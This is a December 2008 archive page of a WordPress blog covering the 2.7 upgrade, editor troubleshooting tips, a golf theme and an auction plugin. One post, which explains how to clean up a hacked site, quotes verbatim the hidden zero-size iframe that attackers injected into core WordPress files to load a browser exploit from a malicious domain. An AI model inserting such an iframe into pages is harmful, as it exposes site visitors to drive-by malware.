Monthly Archives: December 2008

WordPress 2.7 – Smooth rollout

Posted on by
2
20060618 - the mess that is my computer right ...

I’ve rolled out WordPress 2.7 to around 15 blogs so far and haven’t had any issues at all. I’ve had a couple of friends who have had problems, but it was always plugins that caused a problem. It is imperative to remember to deactivate plugins before pushing an update out. Ok, strictly speaking it’s only those that modify database tables that need deactivation, but for the normal user, deactivating all plugins is a sure way to make sure you won’t have any problems.

The great news is that the next update of WordPress will be pretty easy, as the software now takes care of itself. You could compare it to taking one diet pill and not having any weight problems ever again. Upgrading is a matter of going to your Tools menu and selecting Upgrade. Goodbye FTP, goodbye Fantastico; WordPress just rocks!

Help, my WordPress blog is giving a virus warning!

Posted on by
2

I got called in to resolve an issue on a WordPress blog today. On the surface it looked as if the administration side of the site had broken, but the real cause turned out to be much darker than that.

Looking at the source of the page, I could see that lines were being inserted on all pages that tried to open an iFrame onto a website that used a browser exploit to try and install a virus on your computer. If my browser wasn’t patched and I wasn’t using a virus scanner, it could have been a ton of work for me to clean up. The question was, where was that iFrame coming from?

Turns out that a couple (4 actually) of WordPress files had got compromised and had extra lines added to them to open this iFrame. The files were:

  • wp-feed.php
  • wp-blog-header.php
  • wp-config.php
  • wp-load.php

This was the extra line:

<iframe src="http://google-analitics.ws/out.php?s_id=1" width="0" height="0" frameborder="0"></iframe>

These files are used in every WordPress page load and were the cause of the extra iFrame. The big question was how the files got compromised in the first place. They were set to the correct permissions, so could only have been changed by someone (or a script) with root access to the server. Unforuntately this is not something you can protect against. Almost make sure your blog is living on a reliable host and remember, “It’s wilder than Las Vegas out there”

Is your Post Editor broken?

Posted on by
Reply

Excellent post on how to troubleshoot TinyMCE (the WordPress editor) by Andrew Ozz. WordPress is great when it works, but a broken editor is like a pain in the neck (or a plantar fasciitis in the foot). Luckily there are a few things you can try to get your editor back

Here’s what he suggests:

There are a few steps that would help with the troubleshooting if the editor doesn’t start or work properly:

  1. Make sure the “Disable the visual editor when writing” checkbox in your profile is not selected.
  2. Whitelist or set your blog as “trusted” in your firewall and antivirus program.
  3. Disable Gears, clear your browser’s cache, quit it, start it again, go back to the write page and force-reload it several times, while holding down Shift (Firefox) or Ctrl (IE). In Safari select Clear Cache (from the Safari menu on Mac).
  4. Try another browser and/or another computer.
  5. Disable all plugins, clear the cache, restart the browser and try again.
  6. Delete both wp-admin and wp-includes directories and upload fresh copies from the WordPress installation package.
  7. And finally install Firefox or Opera, note any Javascript errors, especially the first one and try searching on the support forum for a solution. If no solution exists, open a new thread including the error.

The advice is written specifically against WordPress 2.7 but the advice will apply to most cases regardless of which version of WordPress you’re using. Read it here

WordPress 2.7 is finally here

Posted on by
1

And WordPress 2.7 goes live! I’ve rolled it out onto a couple of blogs and it’s running just fine. As I blogged before about 2.7 there are some great new features in there. I love the fact that you can download plugins directly from WordPress and that there are a number of features you had to use plugins for before.

As I sit here watching the led light bulbs on my Xmas tree flashing I’m thinking that this was a great present for Christmas! Make sure you get it installed as soon as you can!

One for the golfers

Posted on by
1

Here’s a nice WordPress theme for Golfers. It’s a golf-based theme which allows you to shout about your hobby to the rest of the world.

It’s a three-column theme with all the bells and whistles you may need, and it’s free for all to use. So pack up your Cobra golf clubs, open up your laptop and download the theme for your blog.

Download it here

WordPress 2.7 round the corner

Posted on by
Reply

All the signs are pointing to the imminent release of WordPress 2.7. They’ve rolled out the Release Candidate (running on this blog now), and it’s been rolled out to WordPress.com. This means that barring any major catastrophe, it will be with us in the next few days (I’ve heard the 10th December bandied around).

I’m also working hard on the next iteration of WP Auctions, the plugin you can use on WordPress to auction items right off your blog. There are some changes to be made to make use of all the features in the new version of WordPress, but there are also a host of other features that should make the plugin much easier to use and help pull people to your blog. It doesn’t matter if you’re selling used cisco equipment or peanuts, you know this is the plugin for you ;)